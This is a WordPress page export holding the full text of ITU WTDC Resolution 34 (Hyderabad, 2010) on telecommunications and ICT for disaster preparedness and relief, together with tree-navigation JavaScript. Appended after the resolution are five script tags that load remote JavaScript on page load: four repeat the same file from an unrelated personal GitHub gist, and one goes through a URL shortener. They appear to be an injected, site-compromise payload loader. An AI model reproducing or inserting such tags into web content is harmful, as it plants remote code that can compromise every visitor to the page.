{"id":516,"date":"2013-05-19T01:19:26","date_gmt":"2013-05-19T05:19:26","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=516"},"modified":"2015-06-30T00:07:53","modified_gmt":"2015-06-30T04:07:53","slug":"wtdc_34","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtdc\/wtdc-2010\/wtdc_34\/","title":{"rendered":"WTDC Resolution 34"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTDC RESOLUTION 34 (Rev. Hyderabad, 2010)<\/span><\/h3>\n<h4><span style=\"\">The role of telecommunications\/information and communication technology in disaster preparedness, early warning, rescue, mitigation, relief and response<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Development Conference (Hyderabad, 2010),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recalling<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)Resolution 34 (Rev. Doha, 2006) and Recommendation 12 (Istanbul, 2002) of the World Telecommunication Development Conference (WTDC);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)Resolution 36 (Rev. Antalya, 2006) ofthe Plenipotentiary Conference, on telecommunications\/information and communication technologies (ICTs) in the service of humanitarian assistance;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)Resolution 136 (Antalya, 2006) of the Plenipotentiary Conference, on the use of telecommunications\/ICTs for monitoring and management in emergency and disaster situations, and for early warning, prevention, mitigation and relief,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)that the Intergovernmental Conference on Emergency Telecommunications (Tampere, 1998) (ICET-98) adopted the Convention on the Provision of Telecommunication Resources for Disaster Mitigation and Relief Operations (Tampere Convention) and that this convention came into force in January 2005;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)that the second Tampere Conference on Disaster Communications (Tampere, 2001) (CDC-01) invited ITU to study the use of publicmobile networks for early warning and the dissemination of emergency information and the operational aspects of emergency telecommunications such as call prioritization;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)that the World Radiocommunication Conference (Geneva, 2003), in its Resolution 646, encouraged administrations to satisfy temporary needs for frequencies in emergency and disaster relief situations, to utilize both existing and new technologies for public protection and disaster relief and to facilitate cross-border circulation of radiocommunication equipment intended for use in emergency and disaster-relief situations through mutual cooperation and consultation without hindering national legislation;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)that the World Radiocommunication Conference (Geneva, 2007), in its Resolution 644, resolved that the ITU Radiocommunication Sector(ITU-R) continue to study, as a matter of urgency, those aspects of radiocommunications\/ICTs that are relevant to early warning, disaster mitigation and relief operations, such as decentralized means of telecommunications\/ICTs that are appropriate and generally available, including amateur terrestrial and satellite radio facilities, mobile and portable satellite terminals, as well asthe use of passive space-based sensing systems;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)that the World Radiocommunication Conference (Geneva, 2007), in its Resolution 647, resulted in the ITU-R assisting Member States with their emergency communication preparedness activities by establishing a database of currentlyavailable frequencies for use in emergency situations;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f) that the World Radiocommunication Conference (Geneva, 2007), in its Resolution 673, recognizes the importance of using radiocommunications for Earth observation applications, such as for prediction of disasters and monitoring of the effects of climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g) the work of the ITU-R and ITU Telecommunication Standardization Sector (ITU-T) study groups in adopting Recommendations that have helpedto provide technical information on satellite and terrestrial telecommunication systems and their role in disaster management, including important Recommendations pertaining to the use of satellite networks, particularly those networks which have signed partnership agreements with the Telecommunication Development Bureau (BDT) to be available intimes of disasters;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h) that the Radiocommunication Assembly (Geneva, 2007) adopted Resolution ITU-R 53 on the use of radiocommunications in disaster response and relief and Resolution ITU-R 55 on ITU studies of disaster prediction, detection, mitigation and relief;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)that modern telecommunication technologies are basic tools for disaster mitigation and relief;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">j) the terrible disasters from which many countriessuffer, and the disproportionate impact of disasters on developing countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">k) that least developed countries (LDCs), landlocked developing countries (LLDCs) and small island developing states (SIDS) are particularly vulnerable to the impact that disasters can have on their economies and infrastructures and lack the capacity to respond to disasters;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">l)that the requirements of persons with special needs (e.g. children, older persons, the illiterate, displaced persons, persons with disabilities) should be taken into account with respect to disaster warning, response planning and recovery efforts;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">m) that climate change may be considered to bea major contributing factor to emergencies and disasters affecting humankind;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">n)the role of the private sector in providing telecommunication\/ICT equipment and services, expertise and capacity-building assistance to support disaster-relief and recovery activities, particularly through the ITU Framework for International Cooperation in Emergencies (IFCE);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">o)that the ITU Global Forum on Effective Use of Telecommunications\/ICT for Disaster Management: Saving Lives (2007) outlined ways for ITU and its members to integrate ICTs into disaster-management plans,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)\u00a7 51 of the Geneva Declaration of Principles adopted by the World Summit on the Information Society (WSIS), on the use of ICT applications for disaster prevention;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)\u00a7 20 (c) of the Geneva Plan of Action adoptedby WSIS, on e-environment, which calls for the establishment of monitoring systems, using ICTs, to forecast and monitor the impact of natural and man-made disasters, particularly in developing countries, least developed countries and countries with small economies;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)\u00a7 30 of the Tunis Commitment adopted by WSIS, on disaster mitigation;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)\u00a7 91 of the Tunis Agenda for the Information Society adopted by WSIS, on disaster reduction;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)  the continued pursuit by ITU and other relevantorganizations of joint activities being undertaken at the international, regional and national levels toestablish internationally agreed means to operate systems for public protection and disaster relief on a harmonized and coordinated basis, and the successful role of BDT through the activities of Programme 6 of the Doha Action Plan;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)  that the capability and flexibility of all telecommunication facilities depend upon appropriate planning for the continuity of each phase of network development and implementation; World Telecommunication Development Conference  177<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g) the successful role of BDT with respect to rapid intervention in providing telecommunications\/ICTs serving countries which have suffered disasters;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)that all phases of disaster operations can be greatly facilitated by national emergency communication plans that enable the rapid deployment and effective utilization of ICT equipment,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)the latest version of the ITU Telecommunication Development Sector (ITU-D) Handbook on Emergency Telecommunications (2005), the Compendium of the ITU&#8217;s Work on Emergency Telecommunications (2007), the ITU Handbook on Best Practice on Emergency Telecommunications (2008), and the adoption of Recommendation ITU-D 13 (Rev.2005) on &#8220;Effective utilization of the amateur services in disaster mitigation and relief operations&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) that further guidance for ITU members on disaster communication management is provided by the successful conclusions of ITU-D Study Group 2 Question 22\/2 and the ITU-D Study Group 2 Report on guidelines for using a content standard for alerts and notifications in disasters and emergency situations (2008) regarding the implementation ofRecommendation ITU-T X.1303 on the Common Alerting Protocol (CAP), Report on use of remote sensing for disaster prediction, detection and mitigation (2008), and Guidelines for implementation of satellite telecommunications for disaster management indeveloping countries (2009);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) that the ITU regional offices can be particularly helpful prior to and following emergencies, owing to their proximity to affected countries,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">that the recent tragic events in the world and the experience of BDT in this area in the period between WTDC-06 and WTDC-10 have clearly demonstrated the need for high-quality communications services and reliable telecommunication infrastructure to ensure public safety and assist disaster-relief agencies inminimizing risk to human life and to provide the necessary general public information and communication needs in such situations,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves to instruct the Director ofthe Telecommunication Development Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to continue to ensure that proper consideration be given to emergency communications as an element of telecommunication development, including continued close coordination and collaboration with ITU-R and ITU-T, and other relevant international organizations;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 to facilitate and encourage the use of decentralized means of communications that are appropriate and commonly available to BDT, including those provided by amateur radio, satellite and terrestrial network services\/facilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3 to support administrations in their work towards the implementation ofthis resolution as well as the ratification and implementation of the Tampere Convention;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4 to report to the next WTDC on the status ofratification and implementation of the Tampere Convention;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5 to support administrations and regulators in those areas identified in this resolution by taking appropriate measures during the implementation of the Hyderabad Action Plan;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6 to continue to support administrations in preparing their national disaster-response plans;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7 to strengthen the role of the ITU regional offices in assisting Member States and Sector Members in developing emergency-preparedness plans, in organizing workshops on emergency rescue and response, in providing equipment training and in helping deploy communication equipment during emergencies;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">8 in view of the success of the 2007 global forum, to consider following it with a new world forum on the optimal use of ICTs for disaster management, in collaboration with the General Secretariat and the Radiocommunication and Standardization Bureaux;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">9 to expedite the study of aspects of telecommunications\/ICTs related to flexibility and continuity in the event of disasters, as part of national disaster plans, including promoting the use of broadband networks for emergency communications through the work of the ITU-D study groups and taking account of the activities of the other Sectors;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">10 to instruct Programme 5, in collaboration with the study groups concerned in the other two Sectors, to prepare a handbook\/guidelines on the establishment of telecommunication outside plant in areas frequently suffering from natural disasters,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">requests the Secretary-General<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to continue to work closely with the office of the United Nations Emergency Relief Coordinator and other relevant external organizations with a view to further increasing the Union&#8217;s involvement in, and support to, emergency communications, and to report on the outcome of related international conferences, relief activities and meetings so thatthe Plenipotentiary Conference (Guadalajara, 2010) may take any action that it deems necessary;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 to take the requisite measures to hold the second global forum on optimal use of ICT in disaster and emergency situations within the framework of Programme 5,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 the United Nations Emergency Relief Coordinator and the Working Group on Emergency Telecommunications and the other relevant externalorganizations or bodiesto collaborate closely with ITU, specifically BDT, in working towards implementing this resolution and the Tampere Convention, and supporting administrations and international and regional telecommunication organizations in the implementation of the Convention;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 administrations to deploy all necessary efforts to encourage telecommunication service providers to make available their infrastructure inthe event of disasters,and to take steps to incorporate ICTs into national or regional disaster-management plans and frameworks, including addressing the specific needs of persons with disabilities, children, older persons, displaced persons and the illiterate in disaster preparedness, rescue, relief and recovery planning;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3 regulators to ensure that disaster mitigation and relief operations make provision for the necessary telecommunications\/ICTs, through national regulations and national disaster plans;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4 ITU-D to take account of the particular telecommunication requirements of LDCs, LLDCs, SIDS and low-lying coastal countries in terms of disaster preparedness, rescue, relief and recovery;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5 administrations that have not yet ratified the Tampere Convention to take necessary action to do so as appropriate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6 BDT to consider how space-based technologiescan be used to help ITU Member States collect and disseminate data on the effects of climate change, having regard to the link between climate change and natural disasters;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7 ITU-D to take account of the work of ITU-R, to consider the increased use of mobile and portable communication devices which can be usedby first responders to transmit and receive critical information, and to encourage administrationsto facilitate, to the extent practicable, cross-border circulation of radiocommunication equipment intended for use in emergencies, rescue operations and disaster-relief situations, through mutual cooperation and consultation, without prejudice to national legislation, in accordance with Resolution 646 (WRC-07);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">8 Member States and Sector Members to work together to consider standards and related technical issues for improving radio broadcasting systems for sending and receiving information concerning public warning, rescue, disaster mitigation and relief.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTDC RESOLUTION 34 (Rev. Hyderabad, 2010) The role of telecommunications\/information and communication technology in disaster preparedness, early warning, rescue, mitigation, relief and response The World Telecommunication Development Conference (Hyderabad, 2010), recalling a)Resolution 34 (Rev. Doha, 2006) and Recommendation 12 (Istanbul, 2002) of the World Telecommunication Development Conference (WTDC); b)Resolution 36 (Rev. Antalya, 2006) ofthe Plenipotentiary 